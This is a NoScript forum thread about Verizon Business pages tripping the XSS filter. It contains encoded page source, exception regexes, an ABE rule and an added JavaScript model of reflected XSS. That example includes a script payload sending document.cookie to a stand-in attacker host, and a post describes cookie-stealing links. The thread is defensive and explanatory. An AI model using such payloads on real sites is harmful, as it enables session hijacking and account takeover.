%27%3B%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A++++%3Cscript+language%3D%22javascript%22+src%3D%22https%3A%2F%2Fwww22.verizon.com%2Fincludes%2Fjavascript%2Fomnicode.js%22%3E%3C%2Fscript%3E%0D%0A++++%0D%0A++%3Cscript+language%3D%22javascript%22%3E%0D%0A++++if%28typeof+%28s_837%29+%21%3D+%22undefined%22%29%0D%0A++++%7B%0D%0A++++s_837.pfxID+%3D+%22smb%22%0D%0A++++s_837.pageLanguage%3D%22%22+%2F%2Foverride+en+for+language+by+populating+this+var+with+alternate+2+digit+language+code%0D%0A++++if%28varLoc.indexOf%28%27espanol%27%29+%3E+-1+
%29+s_837.pageLanguage+%3D+%22es%22%0D%0A%0D%0A++++s_837.prop2%3D%22small+business%22%0D%0A++++s_837.prop3%3D%22order%22%0D%0A++++s_837.prop6%3D%22business%22%0D%0A%0D%0A++++s_837.simplepageName+%3D+%22%22%3B%0D%0As_837.detailpageName+%3D+%22%2FFORYOURSMALLBIZ%2FGoFlow%2FMyVerizonNew%2FRegistrationBridge.aspx%22%3B%0D%0As_837.prop4+%3D+%22%22%3B%0D%0As_837.prop5+%3D+%22smb+user%22%3B%0D%0As_837.prop10+%3D+%22%22%3B%0D%0As_837.prop22+%3D+%22%22%3B%0D%0As_837.prop48+%3D+%22EORDERING%22%3B%0D%0As_837.prop74+%3D+%22return%22%3B%0D%0As_837.prop75+%3D+%22%22%3B%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A++var+s_code%3Ds_837.t%28%29%3B%0D%0A++if%28s_code%29%0D%0A++++document.write%28s_code%29%3B%0D%0A%7D%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A%3C%21--+For+QH+61+--+ClearSaleing+Tags+--%3E%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0D%0A++var+csOrderNum+%3D+%27jfsi6022YD%27%3B%0D%0A++var+csOrderType+%3D+%27Loop+Qual+Attempt_General-SB%27%3B%0D%0A++var+csSalesStageCode+%3D+%27Closed%2FWon%27%3B%0D%0A%3C%2Fscript%3E%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0D%0A++csCookieDomain+%3D+%27verizon.com%27%3B%0D%0A%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22https%3A%2F%2Fdsa.csdata1.com%2Fdata%2Fjs%2F19000367%2Fcsgather.js%22%3E%3C%2Fscript%3E%0D%0A%09%3Cscript+language%3D%22javascript%22+type%3D%22text%2Fjavascript%22%3E%0D%0A%09%0D%0A++++%3C%2Fscript%3E%0D%0A++++++%0D%0A%3C%21--%3Cspan+id%3D%22footer%22%3E+--%3E%0D%0A%3Cdiv+class%3D%22vzt%22%3E%0D%0A+%3Cdiv+class%3D%22gb%22%3E%0D%0A%3Cdiv+id%3D%22footer%22+class%3D%22footer%22%3E%0D%0A%0D%0A%0D%0A++++++++++++++++%0D%0A++++++++++++++++%0D%0A++++++++++++++++%3Cdiv+class%3D%22fl%22%3E%0D%0A%09%09++++++++++++%0D%0A%09%09%09++++%0D%0A%09%09%09++++%3Cul%3E%0D%0A++++++++++++++++++++%3Cli%3E%3Ca+id%3D%22Footer1_Truste%22+style%3D%22float%3A+none%22+onclick%3D%22javascript%3Awindow.open%28%27http%3A%2F%2Fwww22.verizon.com%2Fprivacy%2F%27%29%3B+return+false%3B%22+href%3D%22javascript%3Avoid%280%29%3B%22+name%3D%2
2%26amp%3Blid%3Dfooter_trusteeimage%22%3E%0D%0A++++++++++++++++++++++++%3Cimg+alt%3D%22Reviewed+by+TRUSTe+site+privacy+statement%22+src%3D%22..%2FCommon%2FImages%2Ftruste_logo2.gif%22%3E%3C%2Fa%3E%3C%2Fli%3E%0D%0A++++++++++++++++++++%3Cli+class%3D%22last%22%3E%3Ca+style%3D%22float%3A+none%22+onclick%3D%22javascript%3Awindow.open%28%27http%3A%2F%2Fwww.bbbonline.org%2Fcks.asp%3Fid%3D108072593112%27%29%3B+return+false%3B%22+href%3D%22javascript%3Avoid%280%29%3B%22+name%3D%22%26amp%3Blid%3Dhp_res_footer_bbb_logo%22+target%3D%22_blank%22%3E%0D%0A++++++++++++++++++++++++%3Cimg+oncontextmenu%3D%22alert%28%27Use+without+permission+is+prohibited.+The+BBB+Accredited+Business+seal+is+a+trademark+of+the+Council+of+Better+Business+Bureaus%2C+Inc.%27%29%3B+return+false%3B%22+alt%3D%22Click+to+verify+BBB+accreditation+and+to+see+a+BBB+report.%22+src%3D%22..%2FCommon%2FImages%2Fbbb.jpg%22%3E%3C%2Fa%3E%3C%2Fli%3E%0D%0A++++++++++++++++%3C%2Ful%3E%0D%0A++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++%0D%0A%09++++++++++++%0D%0A%09++++++++++++%0D%0A%09++++++++++++%09%09%0D%0A%09++++++++++++%0D%0A%09++++++++++++%3Cdiv+class%3D%22fr%22%3E%0D%0A%09++++++++++++%3Cul%3E%0D%0A%09++++++++++++%3Cli%3E%0D%0A%09++++++++++++++++%3Ca+href%3D%22%23%22+onclick%3D%22javascript%3AO_LC%28%29%3Breturn+false%3B%22+name%3D%22%26amp%3Blid%3Dfooter_privacy%22+target%3D%22%23%22%3ESite+Feedback%3C%2Fa%3E%0D%0A%09++++++++++++++++%3Cspan+class%3D%22divider_new%22%3E%7C%3C%2Fspan%3E%0D%0A%09++++++++++++++++%3C%2Fli%3E%0D%0A%09++++++++++++++++%3Cli%3E%3Cspan+class%3D%22nolink%22+style%3D%22font-size%3A12px%3B%22%3E%3Cfont+color%3D%22black%22%3E+%C2%A9+2013+Verizon+%3C%2Ffont%3E%3C%2Fspan%3E%3C%2Fli%3E%0D%0A%09++++++++++++++++%3C%2Ful%3E%0D%0A%09+++++++++++++%3C%2Fdiv%3E%0D%0A%09++++++++++++%09%0D%0A%09++++++++++++%0D%0A%0D%0A%09%0D%0A%3C%2Fdiv%3E%0D%0A+++%3C%21--From+--%3E%0D%0A%09%0D%0A%09++++%3Cspan+id%3D%22footer1_lblSession%22+style%3D%22display%3Ainline-block%3Bcolor%3AWhite%3Bfont-size%3A10px%3Bwidth%3A73
px%3B%22%3E%3C%2Fspan%3E%0D%0A++++++++%3Cspan+id%3D%22footer1_lblEpSession%22+style%3D%22display%3Ainline-block%3Bcolor%3AWhite%3Bfont-size%3A10px%3Bwidth%3A73px%3B%22%3E%3C%2Fspan%3E%0D%0A++++++++%3Cspan+id%3D%22footer1_lblServerName%22+style%3D%22display%3Ainline-block%3Bcolor%3AWhite%3Bfont-size%3A10px%3Bwidth%3A73px%3B%22%3EFE%3C%2Fspan%3E%0D%0A++++++++%3Cspan+id%3D%22footer1_DatacenterValue%22%3E%3C%2Fspan%3E%09%0D%0A%09%09%09%09%09%3Cbr%3E%0D%0A%09%3C%21--%3C%2Fspan%3E--%3E%0D%0A%09%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%0D%0A%3Cbr%3E%0D%0A%0D%0A%3Cdiv+id%3D%22CJTag%22+style%3D%22DISPLAY%3A+block%22%3E%0D%0A++++%0D%0A%3C%2Fdiv%3E%0D%0A%0D%0A%3C%21--FloodLight+Tag%2CAdded+By+Sasanka+on+21st+May+2010%2C+Please+Do+not+remove+--%3E%0D%0A%3Cdiv+id%3D%22FLTag%22+style%3D%22DISPLAY%3Anone%22%3E%0D%0A++++%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+CT+Tag%2CAdded+By+Sasanka+on+21st+May+2010%2C+Please+do+not+Remove+--%3E%0D%0A%3Cdiv+id%3D%22CTTag%22+style%3D%22DISPLAY%3Anone%22%3E%0D%0A++++%0D%0A%3C%2Fdiv%3E%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22%3E%0D%0A%0D%0Afunction+OpenPop%28sUrl%2C+title%29%0D%0A%7B%0D%0A++++window.open%28sUrl%2C+title%2C+%27toolbar%3D0%2Cscrollbars%3D1%2Cdependent%3Dyes%2Clocation%3D0%2Cstatusbar%3D0%2Cmenubar%3D0%2Cwidth%3D700%2Cheight%3D500%2Cleft%3D30%2Ctop%3D40%2Cresizable%3D0%27%29%3B+%0D%0A++++return%3B%0D%0A%7D%0D%0A%0D%0A%0D%0A%2F%2F+Changes+made+for+Release+TN+Changes%0D%0Aif+%28document.body+%21%3D+null+%26%26+typeof%28BrowserClose%29+%21%3D+%27undefined%27%29%0D%0A%7B%0D%0A%0D%0A++++document.body.onbeforeunload+%3D+BrowserClose%3B%0D%0A++++%0D%0A%7D%0D%0A%0D%0Avar+C1Moffer%3D%22%22%3B%0D%0Aif%28C1Moffer%21%3Dnull+%26%26+C1Moffer%21%3D%22Y%22%29%0D%0A%7B%0D%0A++++if+%28document.body+%21%3D+null%29%0D%0A++++%7B%0D%0A++++++++usrAgnt+%3D+navigator.appName%3B%0D%0A%09++++usrAgnt+%3D+usrAgnt.toLowerCase%28%29%3B%0D%0A%0D%0A%09++++if+%28usrAgnt+%3D%3D+%27netscape%27%29%0D%0A%09++++%7B%0D%0A%09%09++++window.onbeforeunload+%3D+function%28event%29+%7
B+try+%7B+SaveCartBrowserClose%28event%29%3B+%7D+catch+%28e%29+%7B%7D+%7D%0D%0A%09++++%7D%0D%0A%09++++else%0D%0A%09++++%7B%0D%0A%09%09++++document.body.onbeforeunload+%3D+function%28%29+%7B+try+%7B+return+SaveCartBrowserClose%28event%29%3B+%7D+catch+%28e%29+%7B%7D+%7D%3B%0D%0A%09++++%7D%0D%0A++++%7D%0D%0A%7D%0D%0A%0D%0A%2F%2FEnd+of+Changes+made+for+Release+TN+Changes%0D%0Acustom_var+%3D+%22%22%3B%2F%2Fthis+variable+used+in+oo_engine.js+file%0D%0Aif+%28%28typeof+oOobj5+%21%3D+%27undefined%27%29+%26%26+%28oOobj5+%21%3D+null%29+%26%26+%28oOobj5.Metrics+%21%3D+null%29+%26%26+%28oOobj5.Metrics.custom+%21%3D+null%29%29%0D%0A%09oOobj5.Metrics.custom.sessionid+%3D+%22%22%3B%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0D%0Avar+maskArr+%3D+document.getElementsByTagName%28%22input%22%29%3B%0D%0Avar+isVECFlow+%3D+%27%27%3B%0D%0Aif%28document.location.href.indexOf%28%22repcobrowse%22%29%3E-1%29+%0D%0A%7B%0D%0A++++++if%28typeof%28maskArr%29%21%3Dnull%29+%0D%0A++++++%7B%0D%0A++++++++++++for%28i%3D0%3Bi+%3C+maskArr.length%3B+i%2B%2B%29%0D%0A++++++++++++%7B%0D%0A++++++++++++++++++if+%28maskArr%5Bi%5D.id.indexOf%28%22_SECUREINFO%22%29%3E0%29%0D%0A++++++++++++++++++%7B%0D%0A++++++++++++++++++++maskArr%5Bi%5D.value%3D%22***%22%3B%0D%0A++++++++++++++++++%7D%0D%0A++++++++++++%7D%0D%0A++++++%7D%0D%0A%7D%0D%0A%3C%2Fscript%3E%0D%0A+%0D%0A%09++%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fcb.js%22%3E%3C%2Fscript%3E%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fbootstrapper.js%22%3E%3C%2Fscript%3E%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fparser.js%22%3E%3C%2Fscript%3E%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fsandbox.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Ftabset.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Foverlay.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A++++++++%0D%0A++++++++%3Cscrip
t+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fmodal.js%22%3E%3C%2Fscript%3E%0D%0A++++++++%0D%0A%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Fscroller.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A++++++++%3Cscript+src%3D%22..%2Fcommon%2Fincludes%2Fjs%2Ftooltip.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A+++++++%0D%0A+++++++%0D%0A++++++%0D%0A%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22https%3A%2F%2Fcollaborateext.verizon.com%2Fpre%2Fprescripts%2FFiosOR7001%2Fi2cpre.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22+lang%3D%22javascript%22%3E%0D%0A+var+aimsZip+%3D+%22%22%3B%0D%0A+var+aimsState+%3D+%22%22%3B%0D%0A+var+aimsSession++%3D+%22%22%3B%0D%0A+var+productdetails+%3D%22%22%3B%0D%0A+var+fios+%3D%22%22%3B+%0D%0A%2F%2FWR+70676+-+Chat+Platform+Migration+SMB+AMIS+-+Sathish+19%2FSep%2F2011%0D%0A+var+actualBundleCode%3D+%22%22%3B%0D%0A+var+aimsFlow+%3D%22%22%3B%0D%0A+var+aimsChatCreditFlow%3D%220%22%3B%0D%0A+%2F%2FNewly+added+by+Sushanth+for+the+AIMS+Credit+Chat+%0D%0A+var+newconnect+%3D%22%22%3B%0D%0A+var+winback+%3D%22%22%3B+%0D%0A+var+cvcnumber+%3D%22%22%3B+++%2F%2F+Credit+Refrence+No%0D%0A+var+onetimefee+%3D%22%22%3B%0D%0A+var+ordertotal+%3D%22%22%3B%0D%0A+var+ordernumber+%3D%22%22%3B%09%2F%2F+MON+++%0D%0A+var+actualName+%3D%22%22%3B++%2F%2F+LastName+FirstName%0D%0A+var+actualEmail+%3D%22%22%3B%0D%0A+var+accountnumber+%3D%22%22%3B%0D%0A+var+productCode%3D%22%22%3B%0D%0A+%0D%0A+if%28window.attachEvent+%21%3D+null%29%0D%0A++window.attachEvent%28%22onload%22%2CSetCustomerInfo%29%3B%0D%0Aelse+if%28window.addEventListener+%21%3D+null%29+%0D%0A++window.addEventListener%28%22load%22%2CSetCustomerInfo%2Ctrue%29%3B%0D%0A++++%0D%0Afunction+SetCustomerInfo%28%29%0D%0A%7B++%0D%0A%09if%28typeof++aims_setCustomerInfo++%21%3D+%22undefined%22%29+%0D%0A%09%7B%0D%0A%09%09aims_setExtraCustomerInfo%28%27ZIP_CODE%27%2CaimsZip%29%3B%09%2F%2F+zip+code++as+a+String+Value.%0D%0A%09%09aims_setExtraCustomerInfo%28%27DOTCOM_SESSIONID%27%2CaimsSession%29%3B+%0D%0
A%09%09aims_setCustomerInfo%28%27STATE%27%2CaimsState%29%3B+%0D%0A%09%09%2F%2FWR+70676+-+Chat+Platform+Migration+SMB+AMIS+-+Sathish+19%2FSep%2F2011%0D%0A%09%09%2F%2Fif%28aimsFlow%21%3Dnull+%26%26+aimsFlow%21%3D%22%22%29%0D%0A%09%09%09%2F%2Faims_setExtraCustomerInfo+%28%27other%27%2C+aimsFlow+%2B+%22_SMB%22%29%3B%0D%0A%09%09%2F%2Felse%0D%0A%09%09+++aims_setExtraCustomerInfo%28%27other%27%2CaimsFlow%29%3B%0D%0A%09%09aims_setExtraCustomerInfo%28%27BundleCode%27%2CactualBundleCode%29%3B%0D%0A%09%09aims_setExtraCustomerInfo%28%27aimsChatCreditFlow%27%2CaimsChatCreditFlow%29%3B%0D%0A%09%09%2F%2F+Newly+added+by+Sushanth+for+the+AIMS+Credit+Chat%0D%0A%09%09aims_setExtraCustomerInfo%28%27NEW_CONNECT%27%2Cnewconnect%29%3B+%2F%2F+Flag+to+indiciate+if+it+is+a+new+connect+customer%0D%0A%09%09aims_setExtraCustomerInfo%28%27WINBACK%27%2Cwinback%29%3B%09++++%2F%2F+flag+to+indicate+if+it+is+a+winback+customer%0D%0A%09%09aims_setExtraCustomerInfo%28%27CRV_NUMBER%27%2Ccvcnumber%29%3B+%0D%0A%09%09aims_setExtraCustomerInfo%28%27ONE_TIME_FEE%27%2Conetimefee%29%3B+%2F%2Fone+time+fee+amount%0D%0A%09%09aims_setExtraCustomerInfo%28%27ORDER_TOTAL%27%2Cordertotal%29%3B+%2F%2Forder+total+amount%0D%0A%09%09aims_setExtraCustomerInfo%28%27ORDER_NUMBER%27%2Cordernumber%29%3B+%2F%2FMON+if+exists+or+individual+order+number+if+available.%0D%0A%09%09aims_setExtraCustomerInfo%28%27ACCOUNT_NUMBER%27%2Caccountnumber%29%3B+%2F%2Fif+existing+customer%09%09%0D%0A%09%09aims_setCustomerInfo%28%27NAME%27%2CactualName%29%3B++%2F%2Fcustomer+name%0D%0A%09%09aims_setCustomerInfo%28%27EMAIL%27%2CactualEmail%29%3B++%2F%2Fcustomer+Email%0D%0A%09%09aims_setExtraCustomerInfo%28%27PRODUCT_DETAILS%27%2Cproductdetails%29%3B%0D%0A%09%09aims_setExtraCustomerInfo%28%27FIOS%27%2Cfios%29%3B%0D%0A%09%09aims_setExtraCustomerInfo%28%27product+code%27%2CproductCode%29%3B%09%2F%2F+Qualified+Products%0D%0A%09%09aims_setExtraCustomerInfo%28%27mon%27%2Cordernumber%29%3B+%2F%2FMON+if+exists+or+individual+order+number+if+available.%0D%0A
%09%7D%0D%0A%7D%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A++++%3C%2Fform%3E%0D%0A%0D%0A%0D%0A%3Cspan+style%3D%22display%3A+none%3B%22+id%3D%22PREhiddenSpan%22%3E%3Cform+name%3D%22PREhtmlSourceForm%22+id%3D%22PREhtmlSourceForm%22+method%3D%22post%22+action%3D%22https%3A%2F%2Fcollaborateext.verizon.com%2Fpre%2Fpre%2Fpre.serv%22+target%3D%22PREmyFrame%22%3E%3Cinput+name%3D%22PREhtmlSource%22+id%3D%22PREhtmlSource%22+value%3D%22%22+type%3D%22hidden%22%3E%3Cinput+id%3D%22PREclientURL%22+name%3D%22PREclientURL%22+value%3D%22%22+type%3D%22hidden%22%3E%3Cinput+name%3D%22pagesource%22+id%3D%22pagesource%22+value%3D%22true%22+type%3D%22hidden%22%3E%3Cinput+name%3D%22pagerefresh%22+id%3D%22pagerefresh%22+value%3D%22false%22+type%3D%22hidden%22%3E%3C%2Fform%3E%3Ciframe+name%3D%22PREmyFrame%22+src%3D%22javascript%3Afalse%3B%22+frameborder%3D%221%22+height%3D%22200px%22+width%3D%22450px%22%3E%3C%2Fiframe%3E%3C%2Fspan%3E%3C%2Fbody%3E%3C%2Fhtml%3E] from [https://www22.verizon.com/FORYOURSMALLBIZ/GoFlow/MyVerizonNew/RegistrationBridge.aspx]: transformed into a download-only GET request.
Code:
[NoScript InjectionChecker] HTML injection:
[mis-encoded binary log payload, not recoverable from the page]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 SeaMonkey/2.17a2
Re: Verizon Business XSS Issues
And lastly, thankfully: http://pastebin.com/tJKE1M2K
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 SeaMonkey/2.17a2
Re: Verizon Business XSS Issues
Stuff such as "Change My Plan" cannot be seen until you log into your account. But just going to the main page without logging in results in a XSS error as well:
"NoScript filtered a potential cross-site scripting (XSS) attempt from [https://business.verizon.com]."
URL:
Code:
http://business.verizon.net/SMBPortalWeb/vanity.url?orig_url=/SMBPortalWeb/sbcLanding
Console Information:
http://pastebin.com/Vuu4n6iy
http://pastebin.com/AE6xP5V7
I can successfully bypass this XSS error. However...
Once logged in and attempting to access something like "Change My Plan" a new window opens:
"NoScript filtered a potential cross-site scripting (XSS) attempt from [https://www22.verizon.com]."
URL:
Code:
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/LocalBusinessOfficeCC.aspx
Console Information:
http://pastebin.com/573k6VeC
http://pastebin.com/wkHegEbm
And it is these windows that result in loops wherein Unsafe Reload doesn't work.
Hope this helps.
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
Those errors look very much like the site is deliberately assembling its pages using XSS...
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
- Giorgio Maone
- Site Admin
Re: Verizon Business XSS Issues
Thrawn wrote:Those errors look very much like the site is deliberately assembling its pages using XSS...
In fact, that looks so.
The only work-around is adding an exception in NoScript Options|Advanced|XSS like this:
Code:
^@https://www\d*\.verizon\.com/FORYOURSMALLBIZ/
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
Giorgio Maone wrote: The only work-around is adding an exception in NoScript Options|Advanced|XSS like this:
Code:
^@https://www\d*\.verizon\.com/FORYOURSMALLBIZ/
This corrected the error when accessing the deep pages, thanks so much. Can you give me a similar one for the business.verizon.com address as well?
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
How about
Code:
^https://business\.verizon\.com/MyBusinessAccount/*
Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
Tom T. wrote:How about
Code:
^https://business\.verizon\.com/MyBusinessAccount/*
I gave it a try, but it didn't work. If it helps the full URL is:
Code:
http://business.verizon.net/SMBPortalWeb/vanity.url?orig_url=/SMBPortalWeb/sbcLanding
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
If you're going to do this, then please bear in mind that this site is almost certainly vulnerable to real XSS attacks, even though this is a false positive. You should, as a minimum, protect it using RequestPolicy or with an ABE rule such as:
Code:
Site .verizon.com
Accept from SELF++
Sandbox
Or better yet, replace Sandbox with Deny, unless it breaks something.
And you really should contact the Verizon webmaster, to strongly challenge their site design. It's a serious menace to their customers, and shows a total lack of security awareness from their web developers.
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
I'm not sure I could even explain the problem, but maybe I'll post it on their forums.
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
ALbino wrote: I'm not sure I could even explain the problem, but maybe I'll post it on their forums.
Well, what they've basically done is: Instead of using their keys, they've just removed the lock from their front door. Either they were too lazy to build the site properly, or (even scarier) they were totally unaware of just how dangerous their setup is. Either way, someone didn't do their job properly at all.
If I took the time, I expect that I could assemble a link right now that would, if you clicked on it, take you to Verizon and execute any JavaScript that I wanted. I could then put that link onto a website under my control, and make visitors go to it, maybe by redirecting them, or launching a hidden IFRAME. My JavaScript would be embedded in the Verizon page, so it would have the same privileges as JavaScript coming from Verizon itself, allowing me to read your session cookie and account information, impersonate you and take action on your account, etc. After all, the front door is unlocked.
If you're going to use the XSS filter exception that Giorgio suggested, then please do yourself a favor and use ABE as well. As Giorgio said, the suggested exception is a workaround for the fact that the site breaks. It doesn't solve the real problem.
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0
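An added example, written for this page and not code from the thread or from NoScript itself, modelling in JavaScript (Node) the two things discussed above: Thrawn's description of how a reflected parameter becomes script running with the site's own privileges, and the request-side filter plus regex exception list that Giorgio's `^@https://www\d*\.verizon\.com/FORYOURSMALLBIZ/` entry (and Tom T.'s business.verizon.com pattern) work with. The page templates, the `msg` parameter, the example.test and evil.test hosts and the injection heuristic are all constructed for illustration; treating a leading `^@` as "match the destination URL" is an assumption about NoScript's exception syntax, the heuristic is far simpler than NoScript's real InjectionChecker, and ABE is not modelled.

```javascript
'use strict';
// Added example (not from the thread or from NoScript): a toy model of
// reflected XSS, a request-side injection heuristic, and a regex exception
// list in the spirit of NoScript Options|Advanced|XSS. Hosts, pages and the
// "msg" parameter are constructed for illustration.

// Escape text for safe insertion into HTML (text nodes, quoted attributes).
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function queryParam(url, name) {
  return new URL(url).searchParams.get(name) || '';
}

// "Front door unlocked": ?msg= is reflected verbatim into the page, so
// whatever a crafted link carries in msg runs under the site's own origin.
function renderVulnerable(url) {
  return `<html><body><p>Status: ${queryParam(url, 'msg')}</p></body></html>`;
}

// Hardened: the same page with the parameter escaped before insertion.
function renderSafe(url) {
  return `<html><body><p>Status: ${escapeHtml(queryParam(url, 'msg'))}</p></body></html>`;
}

// Does the serialized markup contain a live script element, an inline event
// handler, or a javascript: URL in href/src? (A real check would parse the DOM.)
const LIVE_SCRIPT = /<script\b|<[a-z][^>]*\son\w+\s*=|<[a-z][^>]*\s(?:href|src)\s*=\s*["']?\s*javascript:/i;
function containsScript(html) {
  return LIVE_SCRIPT.test(html);
}

// Request-side heuristic (assumed, much simpler than NoScript's): flag any
// query value carrying an HTML tag, an inline event handler or a javascript:
// URL. A site that legitimately passes markup through the query string trips
// it too, which is exactly what a false positive is.
const SUSPICIOUS = /<\s*\/?[a-z!]|(?:^|\s)on\w+\s*=|javascript:/i;
function looksLikeInjection(url) {
  for (const [, value] of new URL(url).searchParams) {
    if (SUSPICIOUS.test(value)) return true;
  }
  return false;
}

// Exception list built from the two patterns posted in the thread. Each entry
// is a regular expression. A leading "^@" is treated here as "match the
// destination URL" (assumed semantics); this toy has no separate origin, so
// every entry is tested against the request URL.
const EXCEPTIONS = [
  '^@https://www\\d*\\.verizon\\.com/FORYOURSMALLBIZ/',
  // "/*" is zero-or-more slashes, not a glob: anything starting with
  // https://business.verizon.com/MyBusinessAccount matches this entry.
  '^https://business\\.verizon\\.com/MyBusinessAccount/*',
];

function compileException(entry) {
  return new RegExp(entry.replace(/^\^@/, '^'));
}

function isExempt(url, exceptions = EXCEPTIONS) {
  return exceptions.some(entry => compileException(entry).test(url));
}

// Filter decision for one request URL: pass clean requests, block suspicious
// ones unless an exception explicitly lets them through.
function filterDecision(url, exceptions = EXCEPTIONS) {
  if (!looksLikeInjection(url)) return 'allow';
  return isExempt(url, exceptions) ? 'allow-by-exception' : 'block';
}

// Walk through the thread's scenarios with constructed URLs.
function demo() {
  const attack = 'https://example.test/status?msg=<script>document.location="https://evil.test/?c="%2Bdocument.cookie</script>';
  const legit  = 'https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/LocalBusinessOfficeCC.aspx?msg=<b>Plan updated</b>';
  const other  = 'https://www22.verizon.com/Other/page.aspx?msg=<b>Plan updated</b>';
  // The page ALbino actually lands on is business.verizon.net, so a pattern
  // written for business.verizon.com never applies to it.
  const realOp = 'http://business.verizon.net/SMBPortalWeb/vanity.url?orig_url=/SMBPortalWeb/sbcLanding';
  return {
    vulnerableRunsScript:   containsScript(renderVulnerable(attack)),
    safeRunsScript:         containsScript(renderSafe(attack)),
    attackBlocked:          filterDecision(attack),
    legitWithException:     filterDecision(legit),
    otherPathStillFiltered: filterDecision(other),
    dotNetExempt:           isExempt(realOp),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The point the demo makes is the one Thrawn makes in prose: the exception only tells the filter to stop looking at that path, it does not stop the page from reflecting whatever the link carries, and a pattern written for the wrong host (`.com` versus `.net`) silently matches nothing.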
Re: Verizon Business XSS Issues
Thrawn wrote:Well, what they've basically done is: Instead of using their keys, they've just removed the lock from their front door. Either they were too lazy to build the site properly, or (even scarier) they were totally unaware of just how dangerous their setup is. Either way, someone didn't do their job properly at all.
If I took the time, I expect that I could assemble a link right now that would, if you clicked on it, take you to Verizon and execute any JavaScript that I wanted. I could then put that link onto a website under my control, and make visitors go to it, maybe by redirecting them, or launching a hidden IFRAME. My JavaScript would be embedded in the Verizon page, so it would have the same privileges as JavaScript coming from Verizon itself, allowing me to read your session cookie and account information, impersonate you and take action on your account, etc. After all, the front door is unlocked.
If you're going to use the XSS filter exception that Giorgio suggested, then please do yourself a favor and use ABE as well. As Giorgio said, the suggested exception is a workaround for the fact that the site breaks. It doesn't solve the real problem.
I went ahead and added the ABE. Thanks to both of you for that.
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0